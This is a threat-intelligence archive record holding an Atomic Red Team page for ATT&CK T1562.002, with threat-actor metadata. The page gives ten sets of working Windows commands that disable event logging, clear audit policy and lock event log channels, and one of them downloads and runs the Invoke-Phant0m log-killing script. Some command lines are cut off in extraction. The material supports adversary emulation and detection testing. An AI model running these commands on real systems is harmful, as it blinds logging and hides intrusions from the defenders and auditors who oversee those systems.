{ "id": "a819122a-2aa8-4c41-b5b1-963ddadeea1c", "created_at": "2026-04-06T00:12:58.776891Z", "updated_at": "2026-04-10T13:13:08.385838Z", "deleted_at": null, "sha1_hash": "35133d4a5776cdd31b605dbf66355e9e7b352016", "title": "atomic-red-team/atomics/T1562.002/T1562.002.md at master · redcanaryco/atomic-red-team", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 97011, "plain_text": "atomic-red-team/atomics/T1562.002/T1562.002.md at master ·\r\nredcanaryco/atomic-red-team\r\nBy Atomic Red Team doc generator\r\nArchived: 2026-04-05 20:08:38 UTC\r\nT1562.002 - Impair Defenses: Disable Windows Event Logging\r\nDescription from ATT\u0026CK\r\nAdversaries may disable Windows event logging to limit data that can be leveraged for detections and audits.\r\nWindows event logs record user and system activity such as login attempts, process creation, and much more.\r\n(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.\r\nThe EventLog service maintains event logs from various system components and applications.(Citation:\r\nEventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit\r\npolicy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service\r\nlogs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security\r\nSettings\\Local Policies\\Audit Policy for basic audit policy settings or Security Settings\\Advanced Audit\r\nPolicy Configuration for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation:\r\nAdvanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol)\r\nAdversaries may target system-wide logging or just that of a particular application. For example, the Windows\r\nEventLog service may be disabled using the Set-Service -Name EventLog -Status Stopped or sc config\r\neventlog start=disabled commands (followed by manually stopping the service using Stop-Service -Name\r\nEventLog ).(Citation: Disable_Win_Event_Logging)(Citation: disable_win_evt_logging) Additionally, the service\r\nmay be disabled by modifying the “Start” value in\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog then restarting the system for the change\r\nto take effect.(Citation: disable_win_evt_logging)\r\nThere are several ways to disable the EventLog service via registry key modification. First, without Administrator\r\nprivileges, adversaries may modify the \"Start\" value in the key\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Security , then reboot the\r\nsystem to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) Second, with\r\nAdministrator privilege, adversaries may modify the same values in\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-System and\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Application to disable the\r\nentire EventLog.(Citation: disable_win_evt_logging)\r\nAdditionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or\r\nclear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the\r\n/success or /failure parameters. For example, auditpol /set /category:”Account Logon”\r\n/success:disable /failure:disable turns off auditing for the Account Logon category.(Citation:\r\nauditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the\r\nfollowing lines: auditpol /clear /y or auditpol /remove /allusers .(Citation: T1562.002_redcanaryco)\r\nBy disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise\r\nbehind.\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md\r\nPage 1 of 7\n\nSource\r\nAtomic Tests\r\nAtomic Test #1: Disable Windows IIS HTTP Logging\r\nAtomic Test #2: Disable Windows IIS HTTP Logging via PowerShell\r\nAtomic Test #3: Kill Event Log Service Threads\r\nAtomic Test #4: Impair Windows Audit Log Policy\r\nAtomic Test #5: Clear Windows Audit Policy Config\r\nAtomic Test #6: Disable Event Logging with wevtutil\r\nAtomic Test #7: Makes Eventlog blind with Phant0m\r\nAtomic Test #8: Modify Event Log Channel Access Permissions via Registry - PowerShell\r\nAtomic Test #9: Modify Event Log Channel Access Permissions via Registry 2 - PowerShell\r\nAtomic Test #10: Modify Event Log Access Permissions via Registry - PowerShell\r\nAtomic Test #1: Disable Windows IIS HTTP Logging\r\nDisables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires\r\nHTTP logging configurations in IIS to be unlocked.\r\nUse the cleanup commands to restore some default auditpol settings (your original settings will be lost)\r\nSupported Platforms: Windows\r\nauto_generated_guid: 69435dcf-c66f-4ec0-a8b1-82beb76b34db\r\nInputs\r\nName Description Type Default Value\r\nwebsite_name The name of the website on a server string Default Web Site\r\nAttack Commands: Run with powershell !\r\nC:\\Windows\\System32\\inetsrv\\appcmd.exe set config \"#{website_name}\" /section:httplogging /dontLog:true\r\nCleanup Commands\r\nif(Test-Path \"C:\\Windows\\System32\\inetsrv\\appcmd.exe\"){\r\n C:\\Windows\\System32\\inetsrv\\appcmd.exe set config \"#{website_name}\" /section:httplogging /dontLog:false *\u003e$n\r\n}\r\nAtomic Test #2: Disable Windows IIS HTTP Logging via PowerShell\r\nDisables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires\r\nHTTP logging configurations in IIS to be unlocked.\r\nUse the cleanup commands to restore some default auditpol settings (your original settings will be lost)\r\nSupported Platforms: Windows\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md\r\nPage 2 of 7\n\nauto_generated_guid: a957fb0f-1e85-49b2-a211-413366784b1e\r\nInputs\r\nName Description Type Default Value\r\nwebsite_name The name of the website on a server string Default Web Site\r\nAttack Commands: Run with powershell !\r\nset-WebConfigurationProperty -PSPath \"IIS:\\Sites\\#{website_name}\\\" -filter \"system.webServer/httpLogging\" -nam\r\nCleanup Commands\r\nif(Test-Path \"C:\\Windows\\System32\\inetsrv\\appcmd.exe\"){\r\n C:\\Windows\\System32\\inetsrv\\appcmd.exe set config \"#{website_name}\" /section:httplogging /dontLog:false *\u003e$n\r\n}\r\nAtomic Test #3: Kill Event Log Service Threads\r\nKill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will need to restart PC to return to normal\r\nstate with Log Service. https://artofpwn.com/phant0m-killing-windows-event-log.html\r\nSupported Platforms: Windows\r\nauto_generated_guid: 41ac52ba-5d5e-40c0-b267-573ed90489bd\r\nAttack Commands: Run with powershell ! Elevation Required (e.g. root or admin)\r\nSet-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore\r\n$url = \"https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/f1396c411a867e1b471ef80c5c534466103440e0/Invoke\r\n$output = \"$env:TEMP\\Invoke-Phant0m.ps1\"\r\n$wc = New-Object System.Net.WebClient\r\n$wc.DownloadFile($url, $output)\r\ncd $env:TEMP\r\nImport-Module .\\Invoke-Phant0m.ps1\r\nInvoke-Phant0m\r\nCleanup Commands\r\nWrite-Host \"NEED TO Restart-Computer TO ENSURE LOGGING RETURNS\" -fore red\r\nRemove-Item \"$env:TEMP\\Invoke-Phant0m.ps1\" -ErrorAction Ignore\r\nAtomic Test #4: Impair Windows Audit Log Policy\r\nDisables the windows audit policy to prevent key host based telemetry being written into the event logs. Solarigate example\r\nSupported Platforms: Windows\r\nauto_generated_guid: 5102a3a7-e2d7-4129-9e45-f483f2e0eea8\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md\r\nPage 3 of 7\n\nAttack Commands: Run with command_prompt ! Elevation Required (e.g. root or admin)\r\nauditpol /set /category:\"Account Logon\" /success:disable /failure:disable\r\nauditpol /set /category:\"Logon/Logoff\" /success:disable /failure:disable\r\nauditpol /set /category:\"Detailed Tracking\" /success:disable\r\nCleanup Commands\r\nauditpol /set /category:\"Account Logon\" /success:enable /failure:enable\r\nauditpol /set /category:\"Detailed Tracking\" /success:enable\r\nauditpol /set /category:\"Logon/Logoff\" /success:enable /failure:enable\r\nAtomic Test #5: Clear Windows Audit Policy Config\r\nClear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the\r\nsecurity log.\r\nSupported Platforms: Windows\r\nauto_generated_guid: 913c0e4e-4b37-4b78-ad0b-90e7b25010f6\r\nAttack Commands: Run with command_prompt ! Elevation Required (e.g. root or admin)\r\nauditpol /clear /y\r\nauditpol /remove /allusers\r\nCleanup Commands\r\nauditpol /set /category:\"Account Logon\" /success:enable /failure:enable\r\nauditpol /set /category:\"Detailed Tracking\" /success:enable\r\nauditpol /set /category:\"Logon/Logoff\" /success:enable /failure:enable\r\nAtomic Test #6: Disable Event Logging with wevtutil\r\nWevtutil can be used to disable logs. NOTE: RansomEXX ransomware uses this to disable Security logs post-encryption.\r\nSupported Platforms: Windows\r\nauto_generated_guid: b26a3340-dad7-4360-9176-706269c74103\r\nInputs\r\nName Description Type Default Value\r\nlog_name Name of the log to be disabled string Microsoft-Windows-IKE/Operational\r\nAttack Commands: Run with command_prompt !\r\nwevtutil sl \"#{log_name}\" /e:false\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md\r\nPage 4 of 7\n\nCleanup Commands\r\nwevtutil sl \"#{log_name}\" /e:true\r\nAtomic Test #7: Makes Eventlog blind with Phant0m\r\nUse Phant0m to disable Eventlog\r\nSupported Platforms: Windows\r\nauto_generated_guid: 3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741\r\nInputs\r\nName Description Type Default Value\r\nfile_name exe version of Phant0m path PathToAtomicsFolder\\T1562.002\\bin\\Phant0m.exe\r\nAttack Commands: Run with command_prompt !\r\nCleanup Commands\r\necho \"Sorry you have to reboot\"\r\nDependencies: Run with powershell !\r\nDescription: Phant0m.exe must exist on disk at specified location (#{file_name})\r\nCheck Prereq Commands\r\nif (Test-Path \"#{file_name}\") {exit 0} else {exit 1}\r\nGet Prereq Commands\r\nNew-Item -Type Directory (split-path \"#{file_name}\") -ErrorAction ignore | Out-Null\r\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe\r\nAtomic Test #8: Modify Event Log Channel Access Permissions via Registry - PowerShell\r\nThis test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the\r\n\"ChannelAccess\" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These\r\nmodifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling\r\nwho can view or modify a event log channel. Upon execution, the user shouldn't be able to access the event log channel via\r\nthe event viewer or via utilities such as \"Get-EventLog\" or \"wevtutil\".\r\nSupported Platforms: Windows\r\nauto_generated_guid: 8e81d090-0cd6-4d46-863c-eec11311298f\r\nInputs\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md\r\nPage 5 of 7\n\nName Description Type Default Value\r\nChannelPath\r\nPath to the\r\nevent log\r\nservice\r\nchannel to\r\nalter\r\nstring\r\nHKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsof\r\nWindows-TaskScheduler/Operational\r\nAttack Commands: Run with powershell ! Elevation Required (e.g. root or admin)\r\nSet-ItemProperty -Path #{ChannelPath} -Name \"ChannelAccess\" -Value \"O:SYG:SYD:(D;;0x1;;;WD)\"\r\nRestart-Service -Name EventLog -Force -ErrorAction Ignore\r\nCleanup Commands\r\nSet-ItemProperty -Path #{ChannelPath} -Name \"ChannelAccess\" -Value \"O:BAG:SYD:(A;;0x2;;;S-1-15-2-1)(A;;0x2;;;S\r\nRestart-Service -Name EventLog -Force -ErrorAction Ignore\r\nAtomic Test #9: Modify Event Log Channel Access Permissions via Registry 2 - PowerShell\r\nThis test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the\r\n\"ChannelAccess\" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These\r\nmodifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling\r\nwho can view or modify a event log channel. Upon execution, the user shouldn't be able to access the event log channel via\r\nthe event viewer or via utilities such as \"Get-EventLog\" or \"wevtutil\".\r\nSupported Platforms: Windows\r\nauto_generated_guid: 85e6eff8-3ed4-4e03-ae50-aa6a404898a5\r\nInputs\r\nName Description Type Default Value\r\nChannelPath\r\nPath to the event log\r\nservice channel to alter\r\nstring HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\EventLog\\Setup\r\nAttack Commands: Run with powershell ! Elevation Required (e.g. root or admin)\r\nNew-Item -Path #{ChannelPath} -Force\r\nSet-ItemProperty -Path #{ChannelPath} -Name \"ChannelAccess\" -Value \"O:SYG:SYD:(D;;0x1;;;WD)\"\r\nRestart-Service -Name EventLog -Force -ErrorAction Ignore\r\nCleanup Commands\r\nRemove-Item -Path #{ChannelPath} -Force\r\nRestart-Service -Name EventLog -Force -ErrorAction Ignore\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md\r\nPage 6 of 7\n\nAtomic Test #10: Modify Event Log Access Permissions via Registry - PowerShell\r\nThis test simulates an adversary modifying access permissions for a Windows Event Log channel by setting the\r\n\"CustomSD\" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These\r\nmodifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling\r\nwho can view or modify a event log channel. Upon execution, the user shouldn't be able to access the event log channel via\r\nthe event viewer or via utilities such as \"Get-EventLog\" or \"wevtutil\".\r\nSupported Platforms: Windows\r\nauto_generated_guid: a0cb81f8-44d0-4ac4-a8f3-c5c7f43a12c1\r\nInputs\r\nName Description Type Default Value\r\nCustomSDPath\r\nPath to the event log\r\nservice channel to alter\r\nstring HKLM:\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System\r\nAttack Commands: Run with powershell ! Elevation Required (e.g. root or admin)\r\nSet-ItemProperty -Path #{CustomSDPath} -Name \"CustomSD\" -Value \"O:SYG:SYD:(D;;0x1;;;WD)\"\r\nCleanup Commands\r\nRemove-ItemProperty -Path #{CustomSDPath} -Name \"CustomSD\"\r\nSource: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md" ], "report_names": [ "T1562.002.md" ], "threat_actors": [ { "id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c", "created_at": "2022-10-25T15:50:23.819113Z", "updated_at": "2026-04-10T02:00:05.354598Z", "deleted_at": null, "main_name": "Threat Group-3390", "aliases": [ "Threat Group-3390", "Earth Smilodon", "TG-3390", "Emissary Panda", "BRONZE UNION", "APT27", "Iron Tiger", "LuckyMouse", "Linen Typhoon" ], "source_name": "MITRE:Threat Group-3390", "tools": [ "Systeminfo", "gsecdump", "PlugX", "ASPXSpy", "Cobalt Strike", "Mimikatz", "Impacket", "gh0st RAT", "certutil", "China Chopper", "HTTPBrowser", "Tasklist", "netstat", "SysUpdate", "HyperBro", "ZxShell", "RCSession", "ipconfig", "Clambling", "pwdump", "NBTscan", "Pandora", "Windows Credential Editor" ], "source_id": "MITRE", "reports": null }, { "id": "c63ab035-f9f2-4723-959b-97a7b98b5942", "created_at": "2023-01-06T13:46:38.298354Z", "updated_at": "2026-04-10T02:00:02.917311Z", "deleted_at": null, "main_name": "APT27", "aliases": [ "BRONZE UNION", "Circle Typhoon", "Linen Typhoon", "TEMP.Hippo", "Budworm", "Lucky Mouse", "G0027", "GreedyTaotie", "Red Phoenix", "Iron Tiger", "Iron Taurus", "Earth Smilodon", "TG-3390", "EMISSARY PANDA", "Group 35", "ZipToken" ], "source_name": "MISPGALAXY:APT27", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b399b5f1-42d3-4b53-8c73-d448fce6ab43", "created_at": "2025-08-07T02:03:24.68371Z", "updated_at": "2026-04-10T02:00:03.64323Z", "deleted_at": null, "main_name": "BRONZE UNION", "aliases": [ "APT27 ", "Bowser", "Budworm ", "Circle Typhoon ", "Emissary Panda ", "Group35", "Iron Tiger ", "Linen Typhoon ", "Lucky Mouse ", "TG-3390 ", "Temp.Hippo " ], "source_name": "Secureworks:BRONZE UNION", "tools": [ "AbcShell", "China Chopper", "EAGERBEE", "Gh0st RAT", "OwaAuth", "PhantomNet", "PoisonIvy", "Sysupdate", "Wonknu", "Wrapikatz", "ZxShell", "reGeorg" ], "source_id": "Secureworks", "reports": null }, { "id": "5c13338b-eaed-429a-9437-f5015aa98276", "created_at": "2022-10-25T16:07:23.582715Z", "updated_at": "2026-04-10T02:00:04.675765Z", "deleted_at": null, "main_name": "Emissary Panda", "aliases": [ "APT 27", "ATK 15", "Bronze Union", "Budworm", "Circle Typhoon", "Earth Smilodon", "Emissary Panda", "G0027", "Group 35", "Iron Taurus", "Iron Tiger", "Linen Typhoon", "LuckyMouse", "Operation DRBControl", "Operation Iron Tiger", "Operation PZChao", "Operation SpoiledLegacy", "Operation StealthyTrident", "Red Phoenix", "TEMP.Hippo", "TG-3390", "ZipToken" ], "source_name": "ETDA:Emissary Panda", "tools": [ "ASPXSpy", "ASPXTool", "Agent.dhwf", "AngryRebel", "Antak", "CHINACHOPPER", "China Chopper", "Destroy RAT", "DestroyRAT", "FOCUSFJORD", "Farfli", "Gh0st RAT", "Ghost RAT", "HTTPBrowser", "HTran", "HUC Packet Transmit Tool", "HighShell", "HttpBrowser RAT", "HttpDump", "HyperBro", "HyperSSL", "HyperShell", "Kaba", "Korplug", "LOLBAS", "LOLBins", "Living off the Land", "Mimikatz", "Moudour", "Mydoor", "Nishang", "OwaAuth", "PCRat", "PlugX", "ProcDump", "PsExec", "RedDelta", "SEASHARPEE", "Sensocode", "SinoChopper", "Sogu", "SysUpdate", "TIGERPLUG", "TVT", "Thoper", "Token Control", "TokenControl", "TwoFace", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "Xamtrav", "ZXShell", "gsecdump", "luckyowa" ], "source_id": "ETDA", "reports": null }, { "id": "236429ce-6355-43f6-9b58-e6803a1df3f4", "created_at": "2026-03-16T02:02:50.60344Z", "updated_at": "2026-04-10T02:00:03.641587Z", "deleted_at": null, "main_name": "Bronze Union", "aliases": [ "Circle Typhoon ", "Emissary Panda " ], "source_name": "Secureworks:Bronze Union", "tools": [ "China Chopper", "OwaAuth", "Sysupdate" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434378, "ts_updated_at": 1775826788, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/35133d4a5776cdd31b605dbf66355e9e7b352016.pdf", "text": "https://archive.orkl.eu/35133d4a5776cdd31b605dbf66355e9e7b352016.txt", "img": "https://archive.orkl.eu/35133d4a5776cdd31b605dbf66355e9e7b352016.jpg" } }